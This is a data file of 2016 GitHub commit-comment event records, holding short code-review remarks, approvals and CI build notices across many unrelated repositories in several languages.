{"id":"4549508343","type":"CommitCommentEvent","actor":{"login":"evgeny-sav"},"repo":{"name":"evgeny-sav/notes-app"},"payload":{"comment":{"id":18985312,"position":null,"line":null,"path":null,"commit_id":"2ff72b80bcd3dd83d5867ceb7bcdcd287915a512","created_at":"2016-09-12T14:08:18Z","updated_at":"2016-09-12T14:08:18Z","body":"+1"}},"created_at":"2016-09-12T14:08:18Z"}
{"id":"4549510612","type":"CommitCommentEvent","actor":{"login":"jackha"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18985315,"position":65,"line":342,"path":"cura/BuildVolume.py","commit_id":"35168ddd5a7ce0cf2b974d3f377c58fac876a8bd","created_at":"2016-09-12T14:08:40Z","updated_at":"2016-09-12T14:08:40Z","body":"Haha, I'm looking forward to see the Double optimized version"}},"created_at":"2016-09-12T14:08:40Z"}
{"id":"4549510934","type":"CommitCommentEvent","actor":{"login":"rsoletob"},"repo":{"name":"Tecsisa/foulkon"},"payload":{"comment":{"id":18985317,"position":100,"line":305,"path":"http/http_test.go","commit_id":"2dc71e3ccd7260b38a8f36b2715fd586620a5ce0","created_at":"2016-09-12T14:08:43Z","updated_at":"2016-09-12T14:08:43Z","body":"I preffer this outside if statement."}},"created_at":"2016-09-12T14:08:43Z"}
{"id":"4549511390","type":"CommitCommentEvent","actor":{"login":"kasmanavt"},"repo":{"name":"kasmanavt/build-web-application-with-golang-RU"},"payload":{"comment":{"id":18985319,"position":null,"line":null,"path":null,"commit_id":"64187dbbe5b0ae96445efc5e9223a71b0f77cb09","created_at":"2016-09-12T14:08:48Z","updated_at":"2016-09-12T14:08:48Z","body":"initial"}},"created_at":"2016-09-12T14:08:48Z"}
{"id":"4549516697","type":"CommitCommentEvent","actor":{"login":"eugenio412"},"repo":{"name":"simonward86/PogomBOT"},"payload":{"comment":{"id":18985326,"position":151,"line":318,"path":"pogobot.py","commit_id":"bb8acaae38614eb8be75e15416b656931f7bfd61","created_at":"2016-09-12T14:09:42Z","updated_at":"2016-09-12T14:09:42Z","body":"I think is better to have IV at title instead of address, you changed it here"}},"created_at":"2016-09-12T14:09:42Z"}
{"id":"4549520588","type":"CommitCommentEvent","actor":{"login":"hosomi"},"repo":{"name":"hosomi/develop-spring-template"},"payload":{"comment":{"id":18985335,"position":null,"line":null,"path":null,"commit_id":"46d84276606e101e1b9c0b8de035a82cf9282a1c","created_at":"2016-09-12T14:10:22Z","updated_at":"2016-09-12T14:10:22Z","body":">login.html(cdn:bootstrap 3.3.7 -> 3.37) \r\n\r\nlogin.html(cdn:bootstrap 3.3.7 -> 3.3.6) "}},"created_at":"2016-09-12T14:10:22Z"}
{"id":"4549522152","type":"CommitCommentEvent","actor":{"login":"ullutau"},"repo":{"name":"LeoMidnight/ProjectChat"},"payload":{"comment":{"id":18985340,"position":85,"line":85,"path":"main.go","commit_id":"5f1c19f8f6bd29af936cfc8b083162bfb8d9dad1","created_at":"2016-09-12T14:10:37Z","updated_at":"2016-09-12T14:10:37Z","body":"* Reported that action is made before the action is actually made."}},"created_at":"2016-09-12T14:10:37Z"}
{"id":"4549523353","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18985346,"position":null,"line":null,"path":null,"commit_id":"332c5aaf42da6643b0b427ba05f8913f473bae5a","created_at":"2016-09-12T14:10:49Z","updated_at":"2016-09-12T14:10:49Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#YkDSEha9Q2yacWJpTJHzog"}},"created_at":"2016-09-12T14:10:49Z"}
{"id":"4549523952","type":"CommitCommentEvent","actor":{"login":"MikeMcQuaid"},"repo":{"name":"MikeMcQuaid/mikemcquaid.github.io"},"payload":{"comment":{"id":18985348,"position":null,"line":null,"path":null,"commit_id":"1d02f2259f2ba1fa955a53bae01c8ad907646ba5","created_at":"2016-09-12T14:10:56Z","updated_at":"2016-09-12T14:10:56Z","body":"Thanks @benbalter, subscribed!"}},"created_at":"2016-09-12T14:10:56Z"}
{"id":"4549525219","type":"CommitCommentEvent","actor":{"login":"parmentf"},"repo":{"name":"Inist-CNRS/ezmaster"},"payload":{"comment":{"id":18985353,"position":null,"line":null,"path":null,"commit_id":"3f0b79d266e6763768005eb3e50e8bb6114ed88c","created_at":"2016-09-12T14:11:10Z","updated_at":"2016-09-12T14:11:10Z","body":"https://trello.com/c/jGSlHYKA"}},"created_at":"2016-09-12T14:11:10Z"}
{"id":"4549525723","type":"CommitCommentEvent","actor":{"login":"volzhs"},"repo":{"name":"godotengine/godot"},"payload":{"comment":{"id":18985354,"position":null,"line":null,"path":null,"commit_id":"37f1e86108a84c9b371e37c3854d8a03c8aea743","created_at":"2016-09-12T14:11:15Z","updated_at":"2016-09-12T14:11:15Z","body":"Compile error with `tools=no` with this commit :("}},"created_at":"2016-09-12T14:11:15Z"}
{"id":"4549528131","type":"CommitCommentEvent","actor":{"login":"axboe"},"repo":{"name":"axboe/fio"},"payload":{"comment":{"id":18985357,"position":null,"line":null,"path":null,"commit_id":"8dc1a870973e20011282059ba124838cdd120dd3","created_at":"2016-09-12T14:11:38Z","updated_at":"2016-09-12T14:11:38Z","body":"Does this make it work for you:\r\n\r\nhttp://git.kernel.dk/cgit/fio/commit/?id=247e54360a9dff433e815f91b500073fe3c1a820"}},"created_at":"2016-09-12T14:11:38Z"}
{"id":"4549528974","type":"CommitCommentEvent","actor":{"login":"MikeMcQuaid"},"repo":{"name":"MikeMcQuaid/mikemcquaid.github.io"},"payload":{"comment":{"id":18985359,"position":null,"line":null,"path":null,"commit_id":"1d02f2259f2ba1fa955a53bae01c8ad907646ba5","created_at":"2016-09-12T14:11:45Z","updated_at":"2016-09-12T14:11:45Z","body":"> Renaming the file to have an .html extension fixes the issue.\r\n\r\nWorks for me!"}},"created_at":"2016-09-12T14:11:45Z"}
{"id":"4549530013","type":"CommitCommentEvent","actor":{"login":"stockfishdeveloper"},"repo":{"name":"stockfishdeveloper/Demolito"},"payload":{"comment":{"id":18985360,"position":null,"line":null,"path":null,"commit_id":"a65371a3985f0ad9f0d13df63605de7923549a6a","created_at":"2016-09-12T14:11:55Z","updated_at":"2016-09-12T14:11:55Z","body":"How did you test this patch?\r\nIs it fine for me to use LittleBlitzer for testing in the future?"}},"created_at":"2016-09-12T14:11:55Z"}
{"id":"4549534197","type":"CommitCommentEvent","actor":{"login":"FredrIQ"},"repo":{"name":"Diegoisawesome/AwesomeMapEditor"},"payload":{"comment":{"id":18985368,"position":null,"line":null,"path":null,"commit_id":"c6f5f8b2ab7f49b9ffd771d9e1e09baed60a7fe3","created_at":"2016-09-12T14:12:37Z","updated_at":"2016-09-12T14:12:37Z","body":"This breaks qhexedit.h inclusion"}},"created_at":"2016-09-12T14:12:37Z"}
{"id":"4549538188","type":"CommitCommentEvent","actor":{"login":"EdAbdo"},"repo":{"name":"EdAbdo/ED"},"payload":{"comment":{"id":18985380,"position":2,"line":2,"path":".gitignore","commit_id":"3e1959ecec0004d66123d87dddf63b3944fce6a8","created_at":"2016-09-12T14:13:15Z","updated_at":"2016-09-12T14:13:15Z","body":"cv"}},"created_at":"2016-09-12T14:13:15Z"}
{"id":"4549543493","type":"CommitCommentEvent","actor":{"login":"stockfishdeveloper"},"repo":{"name":"stockfishdeveloper/Demolito"},"payload":{"comment":{"id":18985392,"position":null,"line":null,"path":null,"commit_id":"da6e99209ce0bac19bac9d01f64afc0d6bcf07cc","created_at":"2016-09-12T14:14:04Z","updated_at":"2016-09-12T14:14:04Z","body":"Yes, it looks better this way"}},"created_at":"2016-09-12T14:14:04Z"}
{"id":"4549543773","type":"CommitCommentEvent","actor":{"login":"alekseyC64"},"repo":{"name":"evgeny-sav/notes-app"},"payload":{"comment":{"id":18985393,"position":4,"line":4,"path":"notes_app/client/notes.js","commit_id":"2ff72b80bcd3dd83d5867ceb7bcdcd287915a512","created_at":"2016-09-12T14:14:08Z","updated_at":"2016-09-12T14:14:08Z","body":"Please check out how to break this code into several files https://github.com/johnpapa/angular-styleguide/blob/master/a1/README.md#rule-of-1"}},"created_at":"2016-09-12T14:14:08Z"}
{"id":"4549546008","type":"CommitCommentEvent","actor":{"login":"alekseyC64"},"repo":{"name":"evgeny-sav/notes-app"},"payload":{"comment":{"id":18985396,"position":9,"line":10,"path":"notes_app/client/index.html","commit_id":"2ff72b80bcd3dd83d5867ceb7bcdcd287915a512","created_at":"2016-09-12T14:14:27Z","updated_at":"2016-09-12T14:14:27Z","body":"please use the last stable release"}},"created_at":"2016-09-12T14:14:27Z"}
{"id":"4549547439","type":"CommitCommentEvent","actor":{"login":"jloguercio"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":18985400,"position":null,"line":null,"path":null,"commit_id":"8a9b6748ccf0c5aa2f614b582239647b84efc28f","created_at":"2016-09-12T14:14:41Z","updated_at":"2016-09-12T14:14:41Z","body":"He hecho un pull hoy 12 de septiembre y ya se visualizan!"}},"created_at":"2016-09-12T14:14:41Z"}
{"id":"4549548561","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18985405,"position":12,"line":1479,"path":"resources/definitions/fdmprinter.def.json","commit_id":"b21684c079692996ed58e1ce12416f92a3964cd8","created_at":"2016-09-12T14:14:52Z","updated_at":"2016-09-12T14:14:52Z","body":"Should be `support_infill_extruder_nr`"}},"created_at":"2016-09-12T14:14:52Z"}
{"id":"4549550222","type":"CommitCommentEvent","actor":{"login":"Eugeny123"},"repo":{"name":"Eugeny123/Code"},"payload":{"comment":{"id":18985410,"position":null,"line":null,"path":null,"commit_id":"4f852a9b73b33b0bdbc083fcc95e5e7c30ec5059","created_at":"2016-09-12T14:15:09Z","updated_at":"2016-09-12T14:15:09Z","body":"Part_1"}},"created_at":"2016-09-12T14:15:09Z"}
{"id":"4549552737","type":"CommitCommentEvent","actor":{"login":"werty100"},"repo":{"name":"multirom-aries/android_device_xiaomi_aries"},"payload":{"comment":{"id":18985416,"position":null,"line":null,"path":null,"commit_id":"6ece8e7c198afe8df5fe402eff35e98109a94677","created_at":"2016-09-12T14:15:32Z","updated_at":"2016-09-12T14:15:32Z","body":"export LD_SHIM_LIBS is not working in cm14\r\nneed export LD_PRELOAD\r\n"}},"created_at":"2016-09-12T14:15:32Z"}
{"id":"4549553547","type":"CommitCommentEvent","actor":{"login":"asr"},"repo":{"name":"agda/agda"},"payload":{"comment":{"id":18985420,"position":null,"line":null,"path":null,"commit_id":"04981808ea6720b24b91322cc4ad8568b14321b0","created_at":"2016-09-12T14:15:39Z","updated_at":"2016-09-12T14:15:39Z","body":"After the above change, I don't understand why MAlonzo continues printing `-0.0` as `0.0`:\r\n\r\n```\r\n$ cd test/Compiler/simple\r\n$ agda-2.5.2 --ignore-interfaces -c Floats.agda\r\n$ ./Floats\r\n...\r\n-0.0  = 0.0\r\n```\r\n\r\nAny ideas?"}},"created_at":"2016-09-12T14:15:39Z"}
{"id":"4549555988","type":"CommitCommentEvent","actor":{"login":"tgabi333"},"repo":{"name":"otalk/getUserMedia"},"payload":{"comment":{"id":18985422,"position":null,"line":null,"path":null,"commit_id":"3dec644ae8d682c6973201c20b44b8ba01fce929","created_at":"2016-09-12T14:16:03Z","updated_at":"2016-09-12T14:16:03Z","body":"@fippo Could you please release it?"}},"created_at":"2016-09-12T14:16:03Z"}
{"id":"4549556839","type":"CommitCommentEvent","actor":{"login":"yglukhov"},"repo":{"name":"nim-lang/Nim"},"payload":{"comment":{"id":18985424,"position":null,"line":null,"path":null,"commit_id":"87eb3a105d4a2b6f9e9fd18bc6cca18d458d1cca","created_at":"2016-09-12T14:16:13Z","updated_at":"2016-09-12T14:16:13Z","body":"@dom96, this commit intruced a regression. nimongo tests will stuck on windows."}},"created_at":"2016-09-12T14:16:13Z"}
{"id":"4549557278","type":"CommitCommentEvent","actor":{"login":"qiaozhanrong"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18985425,"position":null,"line":null,"path":null,"commit_id":"08c75637edb3c38da12623ff302ea6824aa3f806","created_at":"2016-09-12T14:16:17Z","updated_at":"2016-09-12T14:16:17Z","body":"等等卧槽"}},"created_at":"2016-09-12T14:16:17Z"}
{"id":"4549558080","type":"CommitCommentEvent","actor":{"login":"alekseyC64"},"repo":{"name":"evgeny-sav/notes-app"},"payload":{"comment":{"id":18985426,"position":33,"line":33,"path":"notes_app/client/notes.js","commit_id":"2ff72b80bcd3dd83d5867ceb7bcdcd287915a512","created_at":"2016-09-12T14:16:23Z","updated_at":"2016-09-12T14:16:23Z","body":"please check out best practice about injecting https://github.com/johnpapa/angular-styleguide/blob/master/a1/README.md#manually-identify-dependencies"}},"created_at":"2016-09-12T14:16:23Z"}
{"id":"4549559037","type":"CommitCommentEvent","actor":{"login":"qiaozhanrong"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18985429,"position":null,"line":null,"path":null,"commit_id":"08c75637edb3c38da12623ff302ea6824aa3f806","created_at":"2016-09-12T14:16:31Z","updated_at":"2016-09-12T14:16:31Z","body":"我原来要写的是!./[Rr]elease/"}},"created_at":"2016-09-12T14:16:31Z"}
{"id":"4549559438","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18985431,"position":12,"line":1479,"path":"resources/definitions/fdmprinter.def.json","commit_id":"b21684c079692996ed58e1ce12416f92a3964cd8","created_at":"2016-09-12T14:16:34Z","updated_at":"2016-09-12T14:16:34Z","body":"Fixed in a390315577d364a248f3307f77f97ac2a0b2b870"}},"created_at":"2016-09-12T14:16:34Z"}
{"id":"4549559740","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-android"},"payload":{"comment":{"id":18985433,"position":null,"line":null,"path":null,"commit_id":"d2e2dea779e5c06a3fa1840bfa4b5c499fbfa1cd","created_at":"2016-09-12T14:16:37Z","updated_at":"2016-09-12T14:16:37Z","body":"++"}},"created_at":"2016-09-12T14:16:37Z"}
{"id":"4549560458","type":"CommitCommentEvent","actor":{"login":"qiaozhanrong"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18985436,"position":null,"line":null,"path":null,"commit_id":"08c75637edb3c38da12623ff302ea6824aa3f806","created_at":"2016-09-12T14:16:44Z","updated_at":"2016-09-12T14:16:44Z","body":"结果感叹号忘打了(╯‵□′)╯︵┻━┻"}},"created_at":"2016-09-12T14:16:44Z"}
{"id":"4549560720","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-android"},"payload":{"comment":{"id":18985437,"position":null,"line":null,"path":null,"commit_id":"9cf1e7a1f45ff42cc7a51efc3e9edf731685ac30","created_at":"2016-09-12T14:16:47Z","updated_at":"2016-09-12T14:16:47Z","body":"++"}},"created_at":"2016-09-12T14:16:47Z"}
{"id":"4549562065","type":"CommitCommentEvent","actor":{"login":"grifon"},"repo":{"name":"quetzal19/vvostorge-bx"},"payload":{"comment":{"id":18985444,"position":7,"line":7,"path":"local/php_interface/classes/Service/Personal/UserSubscribe.php","commit_id":"53486aab11a2b540676574dd63a53bf27dfe08cc","created_at":"2016-09-12T14:17:00Z","updated_at":"2016-09-12T14:17:00Z","body":"Точно нужен слеш в начале?"}},"created_at":"2016-09-12T14:17:00Z"}
{"id":"4549562998","type":"CommitCommentEvent","actor":{"login":"grifon"},"repo":{"name":"quetzal19/vvostorge-bx"},"payload":{"comment":{"id":18985448,"position":50,"line":50,"path":"local/php_interface/classes/Service/Personal/UserSubscribe.php","commit_id":"53486aab11a2b540676574dd63a53bf27dfe08cc","created_at":"2016-09-12T14:17:12Z","updated_at":"2016-09-12T14:17:12Z","body":"Где докблок?"}},"created_at":"2016-09-12T14:17:12Z"}
{"id":"4549564137","type":"CommitCommentEvent","actor":{"login":"grifon"},"repo":{"name":"quetzal19/vvostorge-bx"},"payload":{"comment":{"id":18985451,"position":54,"line":54,"path":"local/php_interface/classes/Service/Personal/UserSubscribe.php","commit_id":"53486aab11a2b540676574dd63a53bf27dfe08cc","created_at":"2016-09-12T14:17:22Z","updated_at":"2016-09-12T14:17:22Z","body":"Отформатируй код"}},"created_at":"2016-09-12T14:17:22Z"}
{"id":"4549564340","type":"CommitCommentEvent","actor":{"login":"alekseyC64"},"repo":{"name":"evgeny-sav/notes-app"},"payload":{"comment":{"id":18985452,"position":38,"line":38,"path":"notes_app/client/notes.js","commit_id":"2ff72b80bcd3dd83d5867ceb7bcdcd287915a512","created_at":"2016-09-12T14:17:24Z","updated_at":"2016-09-12T14:17:24Z","body":"I think it's better to use `$http.get('http://localhost:8000/api/v1/note/')`"}},"created_at":"2016-09-12T14:17:24Z"}
{"id":"4549570133","type":"CommitCommentEvent","actor":{"login":"grifon"},"repo":{"name":"quetzal19/vvostorge-bx"},"payload":{"comment":{"id":18985466,"position":62,"line":62,"path":"local/php_interface/classes/Service/Personal/UserSubscribe.php","commit_id":"53486aab11a2b540676574dd63a53bf27dfe08cc","created_at":"2016-09-12T14:18:22Z","updated_at":"2016-09-12T14:18:22Z","body":"Если такое поведение, то это уже не getUserSubscribes, fillUserSubscribes. И не public, а private метод."}},"created_at":"2016-09-12T14:18:22Z"}
{"id":"4549570951","type":"CommitCommentEvent","actor":{"login":"aounhaider1"},"repo":{"name":"maggu2810/smarthome"},"payload":{"comment":{"id":18985471,"position":10,"line":166,"path":"extensions/ui/org.eclipse.smarthome.ui.paper/web-src/js/controllers.control.js","commit_id":"862b1fbc1c9533e6471af99ca8f3c6c573cfaa9a","created_at":"2016-09-12T14:18:30Z","updated_at":"2016-09-12T14:18:30Z","body":"I think item.state should be returned if no state match is found in the options."}},"created_at":"2016-09-12T14:18:30Z"}
{"id":"4549573244","type":"CommitCommentEvent","actor":{"login":"alekseyC64"},"repo":{"name":"evgeny-sav/notes-app"},"payload":{"comment":{"id":18985481,"position":42,"line":42,"path":"notes_app/client/notes.js","commit_id":"2ff72b80bcd3dd83d5867ceb7bcdcd287915a512","created_at":"2016-09-12T14:18:53Z","updated_at":"2016-09-12T14:18:53Z","body":"use `.catch` instead of passing two callbacks into `.then`"}},"created_at":"2016-09-12T14:18:53Z"}
{"id":"4549573631","type":"CommitCommentEvent","actor":{"login":"grifon"},"repo":{"name":"quetzal19/vvostorge-bx"},"payload":{"comment":{"id":18985484,"position":84,"line":84,"path":"local/php_interface/classes/Service/Personal/UserSubscribe.php","commit_id":"53486aab11a2b540676574dd63a53bf27dfe08cc","created_at":"2016-09-12T14:18:56Z","updated_at":"2016-09-12T14:18:56Z","body":"Отформатируй код."}},"created_at":"2016-09-12T14:18:56Z"}
{"id":"4549573667","type":"CommitCommentEvent","actor":{"login":"UlfNorell"},"repo":{"name":"agda/agda"},"payload":{"comment":{"id":18985485,"position":null,"line":null,"path":null,"commit_id":"04981808ea6720b24b91322cc4ad8568b14321b0","created_at":"2016-09-12T14:18:57Z","updated_at":"2016-09-12T14:18:57Z","body":"Maybe if you change `\\\"0.0\\\"` to `\\\"-0.0\\\"`?"}},"created_at":"2016-09-12T14:18:57Z"}
{"id":"4549574757","type":"CommitCommentEvent","actor":{"login":"srinivasan-l"},"repo":{"name":"sarthak98/pcdgit"},"payload":{"comment":{"id":18985488,"position":null,"line":null,"path":null,"commit_id":"2e26455d32c2db5d18e3e042d1b464432932f9a9","created_at":"2016-09-12T14:19:08Z","updated_at":"2016-09-12T14:19:08Z","body":"r2  for imaginary roots is wrong."}},"created_at":"2016-09-12T14:19:08Z"}
{"id":"4549576516","type":"CommitCommentEvent","actor":{"login":"grifon"},"repo":{"name":"quetzal19/vvostorge-bx"},"payload":{"comment":{"id":18985491,"position":87,"line":87,"path":"local/php_interface/classes/Service/Personal/UserSubscribe.php","commit_id":"53486aab11a2b540676574dd63a53bf27dfe08cc","created_at":"2016-09-12T14:19:25Z","updated_at":"2016-09-12T14:19:25Z","body":"Ну масло масяное же. Верни просто:\r\nreturn in_array($newsRubricId, $this->userSubscribes);"}},"created_at":"2016-09-12T14:19:25Z"}
{"id":"4549579901","type":"CommitCommentEvent","actor":{"login":"grifon"},"repo":{"name":"quetzal19/vvostorge-bx"},"payload":{"comment":{"id":18985496,"position":7,"line":7,"path":"local/templates/.default/components/bitrix/main.profile/profile/result_modifier.php","commit_id":"7da110628c3b706a3a6f8557ad6d9c689210eb88","created_at":"2016-09-12T14:19:57Z","updated_at":"2016-09-12T14:19:57Z","body":"Отформатируй код"}},"created_at":"2016-09-12T14:19:57Z"}
{"id":"4549580705","type":"CommitCommentEvent","actor":{"login":"grifon"},"repo":{"name":"quetzal19/vvostorge-bx"},"payload":{"comment":{"id":18985497,"position":7,"line":7,"path":"local/templates/.default/components/bitrix/main.profile/profile/template.php","commit_id":"7da110628c3b706a3a6f8557ad6d9c689210eb88","created_at":"2016-09-12T14:20:06Z","updated_at":"2016-09-12T14:20:06Z","body":"И здесь"}},"created_at":"2016-09-12T14:20:06Z"}
{"id":"4549580896","type":"CommitCommentEvent","actor":{"login":"vinkla"},"repo":{"name":"vinkla/laravel-translator"},"payload":{"comment":{"id":18985500,"position":9,"line":188,"path":"tests/TranslatorTest.php","commit_id":"12b2163e85ff8dc1cd6acd674140e575127640cd","created_at":"2016-09-12T14:20:08Z","updated_at":"2016-09-12T14:20:08Z","body":"Then we've to rewrite the method to check for translated attributes. Might be better actually. I'll look into it."}},"created_at":"2016-09-12T14:20:08Z"}
{"id":"4549581230","type":"CommitCommentEvent","actor":{"login":"kianhean"},"repo":{"name":"giraffeeyl/ShiokBot"},"payload":{"comment":{"id":18985501,"position":null,"line":null,"path":null,"commit_id":"8a8f4d74a0adad3f1d7ba8266cf042c6d6d45229","created_at":"2016-09-12T14:20:13Z","updated_at":"2016-09-12T14:20:13Z","body":"looks good!"}},"created_at":"2016-09-12T14:20:13Z"}
{"id":"4549581926","type":"CommitCommentEvent","actor":{"login":"marthakelly"},"repo":{"name":"kgryte/electron-prebuilt"},"payload":{"comment":{"id":18985504,"position":null,"line":null,"path":null,"commit_id":"b2ca7df4625e9b16cdafa0b780a4771a0f0ef4f4","created_at":"2016-09-12T14:20:19Z","updated_at":"2016-09-12T14:20:19Z","body":"this was really nice of you thanks. unblocked me!"}},"created_at":"2016-09-12T14:20:19Z"}
{"id":"4549582107","type":"CommitCommentEvent","actor":{"login":"alekseyC64"},"repo":{"name":"evgeny-sav/notes-app"},"payload":{"comment":{"id":18985506,"position":36,"line":36,"path":"notes_app/client/notes.js","commit_id":"2ff72b80bcd3dd83d5867ceb7bcdcd287915a512","created_at":"2016-09-12T14:20:20Z","updated_at":"2016-09-12T14:20:20Z","body":"what is the point of `new Promise()` here? `$http.get()` returns a promise"}},"created_at":"2016-09-12T14:20:20Z"}
{"id":"4549582326","type":"CommitCommentEvent","actor":{"login":"grifon"},"repo":{"name":"quetzal19/vvostorge-bx"},"payload":{"comment":{"id":18985508,"position":52,"line":8,"path":"personal/profile/index.php","commit_id":"7da110628c3b706a3a6f8557ad6d9c689210eb88","created_at":"2016-09-12T14:20:22Z","updated_at":"2016-09-12T14:20:22Z","body":"И здесь"}},"created_at":"2016-09-12T14:20:22Z"}
{"id":"4549587476","type":"CommitCommentEvent","actor":{"login":"aounhaider1"},"repo":{"name":"maggu2810/smarthome"},"payload":{"comment":{"id":18985517,"position":5,"line":230,"path":"extensions/ui/org.eclipse.smarthome.ui.paper/web-src/partials/control.html","commit_id":"862b1fbc1c9533e6471af99ca8f3c6c573cfaa9a","created_at":"2016-09-12T14:21:14Z","updated_at":"2016-09-12T14:21:14Z","body":"Read only item's state text will never be shown due to this condition."}},"created_at":"2016-09-12T14:21:14Z"}
{"id":"4549587905","type":"CommitCommentEvent","actor":{"login":"grifon"},"repo":{"name":"quetzal19/vvostorge-bx"},"payload":{"comment":{"id":18985518,"position":16,"line":16,"path":"local/php_interface/classes/Handler/UserHandler.php","commit_id":"ce4a5078181bca185c40ef6c04c04ad9f4310f03","created_at":"2016-09-12T14:21:18Z","updated_at":"2016-09-12T14:21:18Z","body":"Где докблок?"}},"created_at":"2016-09-12T14:21:18Z"}
{"id":"4549589485","type":"CommitCommentEvent","actor":{"login":"grifon"},"repo":{"name":"quetzal19/vvostorge-bx"},"payload":{"comment":{"id":18985520,"position":18,"line":18,"path":"local/php_interface/classes/Handler/UserHandler.php","commit_id":"ce4a5078181bca185c40ef6c04c04ad9f4310f03","created_at":"2016-09-12T14:21:32Z","updated_at":"2016-09-12T14:21:32Z","body":"Отформатируй код"}},"created_at":"2016-09-12T14:21:32Z"}
{"id":"4549590915","type":"CommitCommentEvent","actor":{"login":"praiskup"},"repo":{"name":"fedora-copr/copr"},"payload":{"comment":{"id":18985521,"position":null,"line":null,"path":null,"commit_id":"7f750b7c68f3a27fee8c2dbe52c381c2640c6c56","created_at":"2016-09-12T14:21:46Z","updated_at":"2016-09-12T14:21:46Z","body":"Not entirely. There are things to consider to make a proper isolation with containers (which I miss in this Dockerfile definitely) -- but that is not the point -- using docker pretty complicates copr service adoption. I need to keep in mind that I have to re-build the docker image from now, or do downstream patching.\r\n\r\nI wouldn't raise my voice here just because I'll spent additional time to make docker work because I need to update internal copr service, or because I think that docker just teach us to do things the quickest but not the best way -- I dislike it because generating `srpms` on dist-git is not systematic: (a) dist git keeps sources for packages, (b) building is done by builders. Have a look at koji."}},"created_at":"2016-09-12T14:21:46Z"}
{"id":"4549594324","type":"CommitCommentEvent","actor":{"login":"moldcraft"},"repo":{"name":"ThemeFuse/Unyson"},"payload":{"comment":{"id":18985523,"position":12,"line":135,"path":"framework/static/css/option-types.css","commit_id":"f102dd43e1978860c1fc7acd7c1375b3d2256e44","created_at":"2016-09-12T14:22:21Z","updated_at":"2016-09-12T14:22:21Z","body":"@andreiglingeanu Thank you for reporting. Fixed https://github.com/ThemeFuse/Unyson/commit/486b3373309c8ce643c40ae009f82e228d226e41"}},"created_at":"2016-09-12T14:22:21Z"}
{"id":"4549597713","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18985533,"position":null,"line":null,"path":null,"commit_id":"9a04a88f80e873b1288392e053a871aa3917c529","created_at":"2016-09-12T14:22:51Z","updated_at":"2016-09-12T14:22:51Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 247](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1203&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:28:39"}},"created_at":"2016-09-12T14:22:51Z"}
{"id":"4549597781","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":18985534,"position":null,"line":null,"path":null,"commit_id":"59c938c7050359d1ec7a7fe769523cc1f6bbc9c4","created_at":"2016-09-12T14:22:52Z","updated_at":"2016-09-12T14:22:52Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 248](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1204&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-12T14:22:52Z"}
{"id":"4549600572","type":"CommitCommentEvent","actor":{"login":"DamienCassou"},"repo":{"name":"peterhoeg/nixpkgs"},"payload":{"comment":{"id":18985537,"position":14,"line":22,"path":"pkgs/applications/virtualization/virtualbox/default.nix","commit_id":"f51c1b26808b3497f09e6279ec45c5955c6b1dbd","created_at":"2016-09-12T14:23:20Z","updated_at":"2016-09-12T14:23:20Z","body":"could you please try 5.1.2 instead as there is a [sound problem on 5.1.4](https://github.com/NixOS/nixpkgs/issues/15005#issuecomment-246293464)?"}},"created_at":"2016-09-12T14:23:20Z"}
{"id":"4549603878","type":"CommitCommentEvent","actor":{"login":"grifon"},"repo":{"name":"Kiryusha/GIB_Dashboard"},"payload":{"comment":{"id":18985541,"position":4,"line":48,"path":".development/src/js/main.js","commit_id":"c6a48c4db33336472b29f9bdc4b51b9708b01374","created_at":"2016-09-12T14:23:51Z","updated_at":"2016-09-12T14:23:51Z","body":"А может лучше сделать контроллер для попапа? Потом его можно расширять по надобности."}},"created_at":"2016-09-12T14:23:51Z"}
{"id":"4549608342","type":"CommitCommentEvent","actor":{"login":"asr"},"repo":{"name":"agda/agda"},"payload":{"comment":{"id":18985549,"position":null,"line":null,"path":null,"commit_id":"04981808ea6720b24b91322cc4ad8568b14321b0","created_at":"2016-09-12T14:24:35Z","updated_at":"2016-09-12T14:24:35Z","body":"I don't understand. Could you elaborate please."}},"created_at":"2016-09-12T14:24:35Z"}
{"id":"4549608555","type":"CommitCommentEvent","actor":{"login":"julpaget"},"repo":{"name":"julpaget/MP"},"payload":{"comment":{"id":18985550,"position":9,"line":9,"path":"Contenu","commit_id":"6c0afff50379415121dbf00f405a3c9a4606513a","created_at":"2016-09-12T14:24:37Z","updated_at":"2016-09-12T14:24:37Z","body":"<h2>Sacs et pochettes</h2>\r\n<h2>Petite maroquinerie</h2>\r\n<h2>Ceintures</h2>\r\n<h2>Portes-clefs</h2>\r\n<h2>Le sur-mesure</h2>"}},"created_at":"2016-09-12T14:24:37Z"}
{"id":"4549609321","type":"CommitCommentEvent","actor":{"login":"ignatenkobrain"},"repo":{"name":"rpm-software-management/ci-dnf-stack"},"payload":{"comment":{"id":18985552,"position":7,"line":13,"path":"dnf-docker-test/features/repolist-2.feature","commit_id":"4c8e9991633c0a48d37f6dd78acd11253e18a391","created_at":"2016-09-12T14:24:45Z","updated_at":"2016-09-12T14:24:45Z","body":"you should check what's in stdout then."}},"created_at":"2016-09-12T14:24:45Z"}
